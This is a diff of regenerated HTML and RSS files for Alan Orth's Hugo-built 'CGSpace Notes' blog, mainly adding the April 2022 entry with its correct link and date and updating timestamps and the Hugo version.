<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Categories"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -84,7 +84,7 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/categories/notes/">Notes</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time> by Alan Orth</p>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth</p>
</header>
<a href='https://alanorth.github.io/cgspace-notes/categories/notes/'>Read more →</a>
@ -108,9 +108,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,11 +6,11 @@
<description>Recent content in Categories on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>Notes</title>
<link>https://alanorth.github.io/cgspace-notes/categories/notes/</link>
<pubDate>Tue, 01 Mar 2022 16:46:54 +0300</pubDate>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/categories/notes/</guid>
<description></description>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -81,6 +81,24 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
@ -107,24 +125,6 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
@ -365,9 +365,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,7 +6,16 @@
<description>Recent content in Notes on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>March, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
@ -24,15 +33,6 @@
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
<pubDate>Tue, 01 Mar 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>February, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-02/</link>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -381,9 +381,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -404,9 +404,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -429,9 +429,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -408,9 +408,9 @@ sys 2m7.289s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -358,9 +358,9 @@ COPY 54701
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGIAR Library Migration"/>
<meta name="twitter:description" content="Notes on the migration of the CGIAR Library to CGSpace"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -282,9 +282,9 @@ dspace=# select setval(&#39;handle_seq&#39;,86873);
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace CG Core v2 Migration"/>
<meta name="twitter:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -467,9 +467,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace DSpace 6 Upgrade"/>
<meta name="twitter:description" content="Documenting the DSpace 6 upgrade."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -471,9 +471,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -96,6 +96,24 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
@ -122,24 +140,6 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
@ -380,9 +380,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,7 +6,16 @@
<description>Recent content on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>March, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
@ -24,15 +33,6 @@
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
<pubDate>Tue, 01 Mar 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>February, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-02/</link>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -396,9 +396,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -419,9 +419,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -423,9 +423,9 @@ sys 2m7.289s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

Some files were not shown because too many files have changed in this diff.